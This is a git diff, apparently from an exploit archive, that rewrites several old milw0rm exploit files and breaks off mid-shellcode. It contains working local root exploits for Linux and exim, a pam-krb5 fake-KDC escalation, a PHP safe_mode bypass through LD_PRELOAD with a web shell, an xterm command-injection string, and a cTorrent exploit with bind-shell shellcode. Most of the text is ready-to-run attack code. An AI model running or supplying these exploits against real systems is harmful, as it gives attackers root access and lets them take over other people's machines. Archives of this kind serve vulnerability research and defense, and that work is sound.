sprintf(entry.ut_id,"bad%d",i); + pututline(&entry); + } + } +' > /tmp/fillutmp.c + +cc -o /tmp/fillutmp /tmp/fillutmp.c + +echo 'Ask someone with group utmp privileges to do:' +echo ' chgrp utmp /tmp/fillutmp; chmod 2755 /tmp/fillutmp' +echo -n 'Press [RETURN] to continue... ' +read ANS + +echo ' + #include + + int main(int argc, char *argv[]) + { + while(1) + { + unlink("/tmp/x"); + symlink(argv[1],"/tmp/x"); + unlink("/tmp/x"); + symlink(argv[2],"/tmp/x"); + } + } +' > /tmp/jigglelnk.c + +cc -o /tmp/jigglelnk /tmp/jigglelnk.c + +HOST=`hostname` # or simply localhost? +echo "Which tty do you think a 'telnet $HOST' will use next?" +echo "(Do that telnet and see...)" +read TTY +echo "You said it will be '$TTY' ..." + +ATK=/etc/debian_version # should be /etc/shadow + +echo "Starting symlink re-jiggler ..." +/tmp/jigglelnk $TTY $ATK & +JIG=$! + +LOOP=0 +while :; do + ((LOOP = $LOOP + 1)) + echo; echo; echo "Try = $LOOP" + + /tmp/fillutmp + + echo "Telnetting... if login succeeds, just exit for next try..." + /usr/bin/telnet $HOST + + LS=`ls -ld $ATK` + case "$LS" in + *root*root* ) ;; # not done yet... + * ) + echo; echo + echo "Success after $LOOP tries!" + echo "$LS" + echo; echo + break + ;; + esac +done + +kill $JIG +rm /tmp/fillutmp /tmp/jigglelnk /tmp/x + +# ... +# ~$ logout +# Connection closed by foreign host. +# Success after 12 tries! +# -rw------- 1 psz tty 4 Oct 28 2006 /etc/debian_version + +# milw0rm.com [2008-12-01] diff --git a/platforms/linux/local/7393.txt b/platforms/linux/local/7393.txt index ff0ed2874..ec00ce264 100755 --- a/platforms/linux/local/7393.txt +++ b/platforms/linux/local/7393.txt @@ -1,116 +1,115 @@ - ------------------------------------------------------------------------ -+ safe-bypass-procopen.txt - yet another way to bypass PHP safe_mode. + -+ By Milen Rangelov + ------------------------------------------------------------------------ - - -This *should* work provided that you have met the following requirements: - -1) A writable directory under documentroot to place those files (obviously) -2) You don't have proc_open in your disabled_functions list -3) You are able to compile a shared library on the same platform as the target web server. - - -The reason I'm publishing that is because I posted a similar bug (putenv()+mail()) which was titled as "Bogus" one by the PHP developers. - -Now, this one uses quite the same concept, only different means. - - -How does this work? -------------------- - -You will need to upload 2 files - one precompiled shared library and a php script. Place them in the writable dir and just open http://victim/path/evil.php?c=arbitrarycommand - -You'll need to change the $path variable to match the writable directory - - -Here is the library code, compile with cc -o a.so -fPIC -shared a.c - -a.c: ----- - -#include -#include -#include -int getuid() -{ -char *en; -char *buf=malloc(300); -FILE *a; - -unsetenv("LD_PRELOAD"); -a=fopen(".comm","r"); -buf=fgets(buf,100,a); -write(2,buf,strlen(buf)); -fclose(a); -rename("a.so","b.so"); -system(buf); -system("mv output.txt .comm1"); -rename("b.so","a.so"); -free(buf); -return 0; -} - -*cut* - - - -And that is the PHP script: - -evil.php: -------------------------- - array("pipe", "r"), - 1 => array("file", $path."/output.txt","w"), - 2 => array("file", $path."/errors.txt", "a" ) -); - -$cwd = '.'; -$env = array('LD_PRELOAD' => $path."/a.so"); -$process = proc_open('id > /tmp/a', $descriptorspec, $pipes, $cwd, $env); // example command - should not succeed - - -sleep(1); -$a=fopen($path."/.comm1","r"); - -echo "
";
-while (!feof($a))
-{$b=fgets($a);echo $b;}
-fclose($a);
-echo "
"; - -?> - -*cut* - - -Yeah, I know, it's written pretty lame, it's just a PoC. - - - -Why does that work? -------------------- - -Because the PHP devs like to trust the environment. Especially the dynamic loader variables. In the original bug I posted into their bugtracking system, I suggested that they clean them in mail() for example, but....yuck the bug was classified as *bogus*. - -This demonstrates exactly the same problem. If you have safe_mode enabled, you cannot execute anything except the binaries in the safe mode exec dir. They prepend a trailing slash to your command string and strip "..". Yet, proc_open() enables you to provide your own environment to pass to the new process. proc_open() executes "/bin/sh -c yourcommand" and even though yourcommand is invalid, the LD_PRELOAD is passed to /bin/sh. - -/bin/sh loads your h4h0r library and then BOOM! - - -I hope you'd find that useful. - - -BTW....!!! Dolu naglite programisti :DDD !!! - -# milw0rm.com [2008-12-09] +----------------------------------------------------------------------- ++ safe-bypass-procopen.txt - yet another way to bypass PHP safe_mode. + ++ By Milen Rangelov + +----------------------------------------------------------------------- + + +This *should* work provided that you have met the following requirements: + +1) A writable directory under documentroot to place those files (obviously) +2) You don't have proc_open in your disabled_functions list +3) You are able to compile a shared library on the same platform as the target web server. + + +The reason I'm publishing that is because I posted a similar bug (putenv()+mail()) which was titled as "Bogus" one by the PHP developers. + +Now, this one uses quite the same concept, only different means. + + +How does this work? +------------------- + +You will need to upload 2 files - one precompiled shared library and a php script. Place them in the writable dir and just open http://victim/path/evil.php?c=arbitrarycommand + +You'll need to change the $path variable to match the writable directory + + +Here is the library code, compile with cc -o a.so -fPIC -shared a.c + +a.c: +---- + +#include +#include +#include +int getuid() +{ +char *en; +char *buf=malloc(300); +FILE *a; + +unsetenv("LD_PRELOAD"); +a=fopen(".comm","r"); +buf=fgets(buf,100,a); +write(2,buf,strlen(buf)); +fclose(a); +rename("a.so","b.so"); +system(buf); +system("mv output.txt .comm1"); +rename("b.so","a.so"); +free(buf); +return 0; +} + +*cut* + + + +And that is the PHP script: + +evil.php: +------------------------- + array("pipe", "r"), + 1 => array("file", $path."/output.txt","w"), + 2 => array("file", $path."/errors.txt", "a" ) +); + +$cwd = '.'; +$env = array('LD_PRELOAD' => $path."/a.so"); +$process = proc_open('id > /tmp/a', $descriptorspec, $pipes, $cwd, $env); // example command - should not succeed + + +sleep(1); +$a=fopen($path."/.comm1","r"); + +echo "
";
+while (!feof($a))
+{$b=fgets($a);echo $b;}
+fclose($a);
+echo "
"; + +?> + +*cut* + + +Yeah, I know, it's written pretty lame, it's just a PoC. + + + +Why does that work? +------------------- + +Because the PHP devs like to trust the environment. Especially the dynamic loader variables. In the original bug I posted into their bugtracking system, I suggested that they clean them in mail() for example, but....yuck the bug was classified as *bogus*. + +This demonstrates exactly the same problem. If you have safe_mode enabled, you cannot execute anything except the binaries in the safe mode exec dir. They prepend a trailing slash to your command string and strip "..". Yet, proc_open() enables you to provide your own environment to pass to the new process. proc_open() executes "/bin/sh -c yourcommand" and even though yourcommand is invalid, the LD_PRELOAD is passed to /bin/sh. + +/bin/sh loads your h4h0r library and then BOOM! + + +I hope you'd find that useful. + + +BTW....!!! Dolu naglite programisti :DDD !!! + +# milw0rm.com [2008-12-09] diff --git a/platforms/linux/local/741.pl b/platforms/linux/local/741.pl index d3b0fb298..53d42b159 100755 --- a/platforms/linux/local/741.pl +++ b/platforms/linux/local/741.pl @@ -37,6 +37,6 @@ $new_ret = pack('l',($ret + $offset)); for ($i+=length($shellcode); $i<$len; $i+=4) {$buffer .=$new_ret} -exec("$vulnprog $buffer"); - -# milw0rm.com [2005-01-05] +exec("$vulnprog $buffer"); + +# milw0rm.com [2005-01-05] diff --git a/platforms/linux/local/7681.txt b/platforms/linux/local/7681.txt index 01acbfe0b..820cc3e66 100755 --- a/platforms/linux/local/7681.txt +++ b/platforms/linux/local/7681.txt @@ -1,27 +1,27 @@ -Package: xterm -Version: 222-1etch2 -Severity: grave -Tags: security patch -Justification: user security hole - - -DECRQSS Device Control Request Status String "DCS $ q" simply echoes -(responds with) invalid commands. For example, -perl -e 'print "\eP\$q\nbad-command\n\e\\"' -would run bad-command. - -Exploitability is the same as for the "window title reporting" issue -in DSA-380: include the DCS string in an email message to the victim, -or arrange to have it in syslog to be viewed by root. - -Original: -http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=510030 - -Test: - -perl -e 'print "\eP\$q\nwhoami\n\e\\"' > bla.log -cat bla.log - -If whoami gets executed you should update. - -# milw0rm.com [2009-01-06] +Package: xterm +Version: 222-1etch2 +Severity: grave +Tags: security patch +Justification: user security hole + + +DECRQSS Device Control Request Status String "DCS $ q" simply echoes +(responds with) invalid commands. For example, +perl -e 'print "\eP\$q\nbad-command\n\e\\"' +would run bad-command. + +Exploitability is the same as for the "window title reporting" issue +in DSA-380: include the DCS string in an email message to the victim, +or arrange to have it in syslog to be viewed by root. + +Original: +http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=510030 + +Test: + +perl -e 'print "\eP\$q\nwhoami\n\e\\"' > bla.log +cat bla.log + +If whoami gets executed you should update. + +# milw0rm.com [2009-01-06] diff --git a/platforms/linux/local/776.c b/platforms/linux/local/776.c index b4d68cfb4..81196dae7 100755 --- a/platforms/linux/local/776.c +++ b/platforms/linux/local/776.c @@ -66,6 +66,6 @@ int main(int argc, char *argv[]){ *(long*)(tayfasi+bizim) = RET; execl(NEREDE, NEREDE , bufe, NULL); } -} - -// milw0rm.com [2005-01-26] +} + +// milw0rm.com [2005-01-26] diff --git a/platforms/linux/local/796.sh b/platforms/linux/local/796.sh index 6a89edca8..5626e2001 100755 --- a/platforms/linux/local/796.sh +++ b/platforms/linux/local/796.sh @@ -1,46 +1,46 @@ -#!/bin/sh - -# Local Lame R00T sploit for exim <= 4.42 -# by Dark Eagle -# -# My First Coding Release In bash )) - -# Unl0ck Research Team -# -# More Effective than C-code. -# -# @env.c content: -# -################################################### -# #include -# #include -# int main(int argc, char *argv[]) -# { -# char *addr_ptr; -# addr_ptr = getenv(argv[1]); -# printf("%s @ %p\n", argv[1], addr_ptr); -# return 0; -# } -################################################### - -gcc @env.c -o @env - -cp @env /usr/bin -cd /usr/exim/bin - -CODE=`perl -e 'print "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69 -\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`;export CODE - -@env CODE -echo "So, dude, starting..." -echo "NoW Just Type Address Of CODE" - -read ADDRESS - -echo "You are typed: $ADDRESS" - -echo "Leeeeeeeeeeeeet'sssssssssss g000000000000000!!!!!!!!!" - -./exim -bh ::%A`perl -e 'print pack('L','$ADDRESS') x 256'` - -# milw0rm.com [2005-02-07] +#!/bin/sh + +# Local Lame R00T sploit for exim <= 4.42 +# by Dark Eagle +# +# My First Coding Release In bash )) + +# Unl0ck Research Team +# +# More Effective than C-code. +# +# @env.c content: +# +################################################### +# #include +# #include +# int main(int argc, char *argv[]) +# { +# char *addr_ptr; +# addr_ptr = getenv(argv[1]); +# printf("%s @ %p\n", argv[1], addr_ptr); +# return 0; +# } +################################################### + +gcc @env.c -o @env + +cp @env /usr/bin +cd /usr/exim/bin + +CODE=`perl -e 'print "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69 +\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`;export CODE + +@env CODE +echo "So, dude, starting..." +echo "NoW Just Type Address Of CODE" + +read ADDRESS + +echo "You are typed: $ADDRESS" + +echo "Leeeeeeeeeeeeet'sssssssssss g000000000000000!!!!!!!!!" + +./exim -bh ::%A`perl -e 'print pack('L','$ADDRESS') x 256'` + +# milw0rm.com [2005-02-07] diff --git a/platforms/linux/local/816.c b/platforms/linux/local/816.c index e46752879..10ca2714b 100755 --- a/platforms/linux/local/816.c +++ b/platforms/linux/local/816.c @@ -54,6 +54,6 @@ perror("execl()"); exit(1); } return(0); -} - -// milw0rm.com [2005-02-13] +} + +// milw0rm.com [2005-02-13] diff --git a/platforms/linux/local/824.c b/platforms/linux/local/824.c index d5f4fd617..2b2335942 100755 --- a/platforms/linux/local/824.c +++ b/platforms/linux/local/824.c @@ -67,6 +67,6 @@ execl(argv[1],"VisualBoyAdvance",buffer,0); free(buffer); return 0; -} - -// milw0rm.com [2005-09-13] +} + +// milw0rm.com [2005-09-13] diff --git a/platforms/linux/local/8303.c b/platforms/linux/local/8303.c index 75928eb4d..f9559d111 100755 --- a/platforms/linux/local/8303.c +++ b/platforms/linux/local/8303.c @@ -1,163 +1,163 @@ -/* - * cve-2009-0360.c - * - * pam-krb5 < 3.13 local privilege escalation - * Jon Oberheide - * http://jon.oberheide.org - * - * Information: - * - * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0360 - * - * pam-krb5 before 3.13, when linked against MIT Kerberos, does not properly - * initialize the Kerberos libraries for setuid use, which allows local - * users to gain privileges by pointing an environment variable to a - * modified Kerberos configuration file, and then launching a PAM-based - * setuid application. - * - * Usage: - * - * $ gcc cve-2009-0360.c -o cve-2009-0360 - * $ ./cve-2009-0360 - * [+] creating krb5.conf - * [+] creating kdc.conf - * [+] creating kerberos database - * Loading random data - * Initializing database '/tmp/cve-2009-0360/principal' for realm 'TEST.COM', - * master key name 'K/M@TEST.COM' - * [+] adding principal root@TEST.COM - * Authenticating as principal root@TEST.COM with password. - * Enter KDC database master key: - * WARNING: no policy specified for root@TEST.COM; defaulting to no policy - * Principal "root@TEST.COM" created. - * [+] launching krb5kdc on 141.212.110.163:6666 - * [+] launching su with fake KDC configuration - * [+] enter "root" at the password prompt - * Password: - * # id - * uid=0(root) gid=0(root) ... - * - * Notes: - * - * This exploit will result in local privilege escalation on hosts that use - * the pam-krb5 module for su authentication. Check the su and system-auth - * PAM configuration files in /etc/pam.d to determine if pam-krb5 is in use. - * Some customization of the defined constants and paths may be necessary - * for your environment. Be sure to set FAKE_KDC_HOST to the IP address of - * an active non-loopback interface on the target machine. - */ - -#include -#include -#include -#include -#include -#include -#include -#include - -#define REALM "TEST.COM" -#define FAKE_KDC_HOST "141.212.110.163" -#define FAKE_KDC_PORT "6666" -#define PRINCIPAL_NAME "root" -#define PRINCIPAL_PASS "root" -#define TMP_DIR "/tmp/cve-2009-0360" -#define KUTIL_PATH "/usr/sbin/kdb5_util" -#define KADMIN_PATH "/usr/sbin/kadmin.local" -#define KRB5KDC_PATH "/usr/sbin/krb5kdc" - -#define KRB5_CONF \ - "[libdefaults]\n\tdefault_realm = " REALM "\n\n[realms]\n\t" REALM \ - " = {\n\t\tadmin_server = " FAKE_KDC_HOST ":" FAKE_KDC_PORT "\n\t\t" \ - "default_domain = " REALM "\n\t\tkdc = " FAKE_KDC_HOST ":" FAKE_KDC_PORT \ - "\n\t}\n\n[domain_realm]\n\t." REALM " = " REALM "\n\t" REALM " = " REALM - -#define KDC_CONF \ - "[kdcdefaults]\n\tkdc_ports = " FAKE_KDC_PORT "\n\n[realms]\n\t" REALM \ - " = {\n\t\tdatabase_name = " TMP_DIR "/principal\n\t\tadmin_keytab = " \ - "FILE:" TMP_DIR "/kadm5.keytab\n\t\tacl_file = " TMP_DIR "/kadm5.acl" \ - "\n\t\tkey_stash_file = " TMP_DIR "/stash\n\t\tkdc_ports = " FAKE_KDC_PORT \ - "\n\t\tmax_life = 10h 0m 0s\n\t\tmax_renewable_life = 7d 0h 0m 0s\n\t}" - -int -main(void) -{ - int ret; - FILE *fp; - char *err; - - ret = mkdir(TMP_DIR, 0755); - if (ret == -1 && errno != EEXIST) { - err = "cannot create TMP_DIR"; - printf("[-] Error: %s (%s)\n", err, strerror(errno)); - return 1; - } - - printf("[+] creating krb5.conf\n"); - sleep(1); - - fp = fopen(TMP_DIR "/krb5.conf", "w"); - if (!fp) { - err = "cannot open krb5.conf"; - printf("[-] Error: %s (%s)\n", err, strerror(errno)); - return 1; - } - fwrite(KRB5_CONF, 1, strlen(KRB5_CONF), fp); - fclose(fp); - - printf("[+] creating kdc.conf\n"); - sleep(1); - - fp = fopen(TMP_DIR "/kdc.conf", "w"); - if (!fp) { - err = "cannot open kdc.conf"; - printf("[-] Error: %s (%s)\n", err, strerror(errno)); - return 1; - } - fwrite(KDC_CONF, 1, strlen(KDC_CONF), fp); - fclose(fp); - - chdir(TMP_DIR); - - printf("[+] creating kerberos database\n"); - sleep(1); - - ret = system(KUTIL_PATH " create -d " TMP_DIR "/principal -sf " TMP_DIR \ - "/stash -r " REALM " -s -P \"\""); - if (WEXITSTATUS(ret) != 0) { - err = "kdb5_util command returned non-zero"; - printf("[-] Error: %s, continuing exploit anyway\n", err); - } - - printf("[+] adding principal " PRINCIPAL_NAME "@" REALM "\n"); - sleep(1); - - ret = system("echo \"\" | " KADMIN_PATH " -m -p " PRINCIPAL_NAME "@" REALM \ - " -d " TMP_DIR "/principal -r " REALM " -q \"add_principal " \ - "-pw " PRINCIPAL_PASS " " PRINCIPAL_NAME "@" REALM "\""); - if (WEXITSTATUS(ret) != 0) { - err = "kadmin.local command returned non-zero"; - printf("[-] Error: %s, continuing exploit anyway\n", err); - } - - printf("[+] launching krb5kdc on " FAKE_KDC_HOST ":" FAKE_KDC_PORT "\n"); - sleep(1); - - ret = system("KRB5_KDC_PROFILE=\"" TMP_DIR "/kdc.conf\" " KRB5KDC_PATH \ - " -d " TMP_DIR "/principal -r " REALM); - if (WEXITSTATUS(ret) != 0) { - err = "krb5kdc command returned non-zero"; - printf("[-] Error: %s, continuing exploit anyway\n", err); - } - - printf("[+] launching su with fake KDC configuration\n"); - sleep(1); - printf("[+] enter \"" PRINCIPAL_PASS "\" at the password prompt\n"); - sleep(1); - - system("KRB5_CONFIG=\"" TMP_DIR "/krb5.conf\" su"); - - return 0; -} - -// milw0rm.com [2009-03-29] +/* + * cve-2009-0360.c + * + * pam-krb5 < 3.13 local privilege escalation + * Jon Oberheide + * http://jon.oberheide.org + * + * Information: + * + * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0360 + * + * pam-krb5 before 3.13, when linked against MIT Kerberos, does not properly + * initialize the Kerberos libraries for setuid use, which allows local + * users to gain privileges by pointing an environment variable to a + * modified Kerberos configuration file, and then launching a PAM-based + * setuid application. + * + * Usage: + * + * $ gcc cve-2009-0360.c -o cve-2009-0360 + * $ ./cve-2009-0360 + * [+] creating krb5.conf + * [+] creating kdc.conf + * [+] creating kerberos database + * Loading random data + * Initializing database '/tmp/cve-2009-0360/principal' for realm 'TEST.COM', + * master key name 'K/M@TEST.COM' + * [+] adding principal root@TEST.COM + * Authenticating as principal root@TEST.COM with password. + * Enter KDC database master key: + * WARNING: no policy specified for root@TEST.COM; defaulting to no policy + * Principal "root@TEST.COM" created. + * [+] launching krb5kdc on 141.212.110.163:6666 + * [+] launching su with fake KDC configuration + * [+] enter "root" at the password prompt + * Password: + * # id + * uid=0(root) gid=0(root) ... + * + * Notes: + * + * This exploit will result in local privilege escalation on hosts that use + * the pam-krb5 module for su authentication. Check the su and system-auth + * PAM configuration files in /etc/pam.d to determine if pam-krb5 is in use. + * Some customization of the defined constants and paths may be necessary + * for your environment. Be sure to set FAKE_KDC_HOST to the IP address of + * an active non-loopback interface on the target machine. + */ + +#include +#include +#include +#include +#include +#include +#include +#include + +#define REALM "TEST.COM" +#define FAKE_KDC_HOST "141.212.110.163" +#define FAKE_KDC_PORT "6666" +#define PRINCIPAL_NAME "root" +#define PRINCIPAL_PASS "root" +#define TMP_DIR "/tmp/cve-2009-0360" +#define KUTIL_PATH "/usr/sbin/kdb5_util" +#define KADMIN_PATH "/usr/sbin/kadmin.local" +#define KRB5KDC_PATH "/usr/sbin/krb5kdc" + +#define KRB5_CONF \ + "[libdefaults]\n\tdefault_realm = " REALM "\n\n[realms]\n\t" REALM \ + " = {\n\t\tadmin_server = " FAKE_KDC_HOST ":" FAKE_KDC_PORT "\n\t\t" \ + "default_domain = " REALM "\n\t\tkdc = " FAKE_KDC_HOST ":" FAKE_KDC_PORT \ + "\n\t}\n\n[domain_realm]\n\t." REALM " = " REALM "\n\t" REALM " = " REALM + +#define KDC_CONF \ + "[kdcdefaults]\n\tkdc_ports = " FAKE_KDC_PORT "\n\n[realms]\n\t" REALM \ + " = {\n\t\tdatabase_name = " TMP_DIR "/principal\n\t\tadmin_keytab = " \ + "FILE:" TMP_DIR "/kadm5.keytab\n\t\tacl_file = " TMP_DIR "/kadm5.acl" \ + "\n\t\tkey_stash_file = " TMP_DIR "/stash\n\t\tkdc_ports = " FAKE_KDC_PORT \ + "\n\t\tmax_life = 10h 0m 0s\n\t\tmax_renewable_life = 7d 0h 0m 0s\n\t}" + +int +main(void) +{ + int ret; + FILE *fp; + char *err; + + ret = mkdir(TMP_DIR, 0755); + if (ret == -1 && errno != EEXIST) { + err = "cannot create TMP_DIR"; + printf("[-] Error: %s (%s)\n", err, strerror(errno)); + return 1; + } + + printf("[+] creating krb5.conf\n"); + sleep(1); + + fp = fopen(TMP_DIR "/krb5.conf", "w"); + if (!fp) { + err = "cannot open krb5.conf"; + printf("[-] Error: %s (%s)\n", err, strerror(errno)); + return 1; + } + fwrite(KRB5_CONF, 1, strlen(KRB5_CONF), fp); + fclose(fp); + + printf("[+] creating kdc.conf\n"); + sleep(1); + + fp = fopen(TMP_DIR "/kdc.conf", "w"); + if (!fp) { + err = "cannot open kdc.conf"; + printf("[-] Error: %s (%s)\n", err, strerror(errno)); + return 1; + } + fwrite(KDC_CONF, 1, strlen(KDC_CONF), fp); + fclose(fp); + + chdir(TMP_DIR); + + printf("[+] creating kerberos database\n"); + sleep(1); + + ret = system(KUTIL_PATH " create -d " TMP_DIR "/principal -sf " TMP_DIR \ + "/stash -r " REALM " -s -P \"\""); + if (WEXITSTATUS(ret) != 0) { + err = "kdb5_util command returned non-zero"; + printf("[-] Error: %s, continuing exploit anyway\n", err); + } + + printf("[+] adding principal " PRINCIPAL_NAME "@" REALM "\n"); + sleep(1); + + ret = system("echo \"\" | " KADMIN_PATH " -m -p " PRINCIPAL_NAME "@" REALM \ + " -d " TMP_DIR "/principal -r " REALM " -q \"add_principal " \ + "-pw " PRINCIPAL_PASS " " PRINCIPAL_NAME "@" REALM "\""); + if (WEXITSTATUS(ret) != 0) { + err = "kadmin.local command returned non-zero"; + printf("[-] Error: %s, continuing exploit anyway\n", err); + } + + printf("[+] launching krb5kdc on " FAKE_KDC_HOST ":" FAKE_KDC_PORT "\n"); + sleep(1); + + ret = system("KRB5_KDC_PROFILE=\"" TMP_DIR "/kdc.conf\" " KRB5KDC_PATH \ + " -d " TMP_DIR "/principal -r " REALM); + if (WEXITSTATUS(ret) != 0) { + err = "krb5kdc command returned non-zero"; + printf("[-] Error: %s, continuing exploit anyway\n", err); + } + + printf("[+] launching su with fake KDC configuration\n"); + sleep(1); + printf("[+] enter \"" PRINCIPAL_PASS "\" at the password prompt\n"); + sleep(1); + + system("KRB5_CONFIG=\"" TMP_DIR "/krb5.conf\" su"); + + return 0; +} + +// milw0rm.com [2009-03-29] diff --git a/platforms/linux/local/8369.sh b/platforms/linux/local/8369.sh index c04e1312d..344e17796 100755 --- a/platforms/linux/local/8369.sh +++ b/platforms/linux/local/8369.sh @@ -1,103 +1,103 @@ -#!/bin/sh - -################################################################################### -# gw-notexit.sh: Linux kernel <2.6.29 exit_notify() local root exploit -# -# by Milen Rangelov (gat3way-at-gat3way-dot-eu) -# -# Based on 'exit_notify()' CAP_KILL verification bug found by Oleg Nestorov. -# Basically it allows us to send arbitrary signals to a privileged (suidroot) -# parent process. Due to a bad check, the child process with appropriate exit signal -# already set can first execute a suidroot binary then exit() and thus bypass -# in-kernel privilege checks. We use chfn and gpasswd for that purpose. -# -# !!!!!!!!!!! -# Needs /proc/sys/fs/suid_dumpable set to 1 or 2. The default is 0 -# so you'll be out of luck most of the time. -# So it is not going to be the script kiddies' new killer shit :-) -# !!!!!!!!!!! -# -# if you invent a better way to escalate privileges by sending arbitrary signals to -# the parent process, please mail me :) That was the best I could think of today :-( -# -# This one made me nostalgic about the prctl(PR_SET_DUMPABLE,2) madness -# -# Skuchna rabota... -# -#################################################################################### - - - - -SUIDDUMP=`cat /proc/sys/fs/suid_dumpable` -if [ $SUIDDUMP -lt 1 ]; then echo -e "suid_dumpable=0 - system not vulnerable!\n";exit; fi -if [ -d /etc/logrotate.d ]; then -echo "logrotate installed, that's good!" -else -echo "No logrotate installed, sorry!";exit -fi - -echo -e "Compiling the bash setuid() wrapper..." -cat >> /tmp/.m.c << EOF -#include -#include - -int main() -{ - setuid(0); - execl("/bin/bash","[kthreadd]",NULL); -} -EOF - -cc /tmp/.m.c -o /tmp/.m -rm /tmp/.m.c - -echo -e "Compiling the exploit code..." - -cat >> /tmp/exploit.c << EOF -#include -#include -#include -#include -#include - -int child(void *data) -{ - sleep(2); - printf("I'm gonna kill the suidroot father without having root rights :D\n"); - execl("/usr/bin/gpasswd","%s",NULL); - exit(0); -} - -int main() -{ - int stacksize = 4*getpagesize(); - void *stack, *stacktop; - stack = malloc(stacksize); - stacktop = stack + stacksize; - chdir("/etc/logrotate.d"); - int p = clone(child, stacktop, CLONE_FILES|SIGSEGV, NULL); - if (p>0) execl("/usr/bin/chfn","\n/tmp/.a\n{\nsize=0\nprerotate\n\tchown root /tmp/.m;chmod u+s /tmp/.m\nendscript\n}\n\n",NULL); -} -EOF - -cc /tmp/exploit.c -o /tmp/.ex -rm /tmp/exploit.c - -echo -e "Setting coredump limits and running the exploit...\n" -ulimit -c 10000 -touch /tmp/.a -`/tmp/.ex >/dev/null 2>/dev/null` -sleep 5 -rm /tmp/.ex - -if [ -e /etc/logrotate.d/core ]; then -echo -e "Successfully coredumped into the logrotate config dir\nNow wait until cron.daily executes logrotate and makes your shell wrapper suid\n" -echo -e "The shell should be located in /tmp/.m - just run /tmp/.m after 24h and you'll be root" -echo -e "\nYour terminal is most probably screwed now, sorry for that..." -exit -fi - -echo "The system is not vulnerable, sorry :(" - -# milw0rm.com [2009-04-08] +#!/bin/sh + +################################################################################### +# gw-notexit.sh: Linux kernel <2.6.29 exit_notify() local root exploit +# +# by Milen Rangelov (gat3way-at-gat3way-dot-eu) +# +# Based on 'exit_notify()' CAP_KILL verification bug found by Oleg Nestorov. +# Basically it allows us to send arbitrary signals to a privileged (suidroot) +# parent process. Due to a bad check, the child process with appropriate exit signal +# already set can first execute a suidroot binary then exit() and thus bypass +# in-kernel privilege checks. We use chfn and gpasswd for that purpose. +# +# !!!!!!!!!!! +# Needs /proc/sys/fs/suid_dumpable set to 1 or 2. The default is 0 +# so you'll be out of luck most of the time. +# So it is not going to be the script kiddies' new killer shit :-) +# !!!!!!!!!!! +# +# if you invent a better way to escalate privileges by sending arbitrary signals to +# the parent process, please mail me :) That was the best I could think of today :-( +# +# This one made me nostalgic about the prctl(PR_SET_DUMPABLE,2) madness +# +# Skuchna rabota... +# +#################################################################################### + + + + +SUIDDUMP=`cat /proc/sys/fs/suid_dumpable` +if [ $SUIDDUMP -lt 1 ]; then echo -e "suid_dumpable=0 - system not vulnerable!\n";exit; fi +if [ -d /etc/logrotate.d ]; then +echo "logrotate installed, that's good!" +else +echo "No logrotate installed, sorry!";exit +fi + +echo -e "Compiling the bash setuid() wrapper..." +cat >> /tmp/.m.c << EOF +#include +#include + +int main() +{ + setuid(0); + execl("/bin/bash","[kthreadd]",NULL); +} +EOF + +cc /tmp/.m.c -o /tmp/.m +rm /tmp/.m.c + +echo -e "Compiling the exploit code..." + +cat >> /tmp/exploit.c << EOF +#include +#include +#include +#include +#include + +int child(void *data) +{ + sleep(2); + printf("I'm gonna kill the suidroot father without having root rights :D\n"); + execl("/usr/bin/gpasswd","%s",NULL); + exit(0); +} + +int main() +{ + int stacksize = 4*getpagesize(); + void *stack, *stacktop; + stack = malloc(stacksize); + stacktop = stack + stacksize; + chdir("/etc/logrotate.d"); + int p = clone(child, stacktop, CLONE_FILES|SIGSEGV, NULL); + if (p>0) execl("/usr/bin/chfn","\n/tmp/.a\n{\nsize=0\nprerotate\n\tchown root /tmp/.m;chmod u+s /tmp/.m\nendscript\n}\n\n",NULL); +} +EOF + +cc /tmp/exploit.c -o /tmp/.ex +rm /tmp/exploit.c + +echo -e "Setting coredump limits and running the exploit...\n" +ulimit -c 10000 +touch /tmp/.a +`/tmp/.ex >/dev/null 2>/dev/null` +sleep 5 +rm /tmp/.ex + +if [ -e /etc/logrotate.d/core ]; then +echo -e "Successfully coredumped into the logrotate config dir\nNow wait until cron.daily executes logrotate and makes your shell wrapper suid\n" +echo -e "The shell should be located in /tmp/.m - just run /tmp/.m after 24h and you'll be root" +echo -e "\nYour terminal is most probably screwed now, sorry for that..." +exit +fi + +echo "The system is not vulnerable, sorry :(" + +# milw0rm.com [2009-04-08] diff --git a/platforms/linux/local/8470.py b/platforms/linux/local/8470.py index b89dcbd4c..2327f726e 100755 --- a/platforms/linux/local/8470.py +++ b/platforms/linux/local/8470.py @@ -1,215 +1,215 @@ -#!/usr/bin/python - -#Written By Michael Brooks -#04/17/2009 - -#Stack Based Buffer Overflow -#The vulnerability is in the btFiles::BuildFromMI function -#inside the btfiles.cpp file - -#Exploit tested on cTorrent 1.3.4 using Debian Sarge using Linux kernel 2.4.27-3-386 -#Can't get the exploit working on a modern linux kernel because of ASLR - -#code is using python 2.5 - -#Home page for cTorrent 1.3.4: -#http://sourceforge.net/projects/ctorrent/ 161,000+ Downloads -#dTorrent 3.3.2 is also vulnerable: -#http://sourceforge.net/projects/dtorrent/ 18,000+ downloads - -import sys -import os -#This code will take any torrent file and turn it into an exploit. -USAGE="python exploit.py in_file.torrent out_file.torrent" - -def main(): - #Start of the program - bfile=fileio() - try: - bad_torrent=bfile.read_bencode(sys.argv[1]) - except: - print USAGE - sys.exit() - - exploit_str=create_exploit() - print("Writing Bytes:"+str(len(exploit_str))) - bad_torrent["info"]["files"][0]["path"][0]=exploit_str - try: - bfile.write_bencode(sys.argv[2], bad_torrent) - except: - print USAGE - sys.exit() - -def create_exploit(): - # linux_ia32_bind - LPORT=4444 Size=108 Encoder=PexFnstenvSub http://metasploit.com - shellcode = "\x2b\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x27" - shellcode += "\x1a\xbe\x4e\x83\xeb\xfc\xe2\xf4\x16\xc1\xed\x0d\x74\x70\xbc\x24" - shellcode += 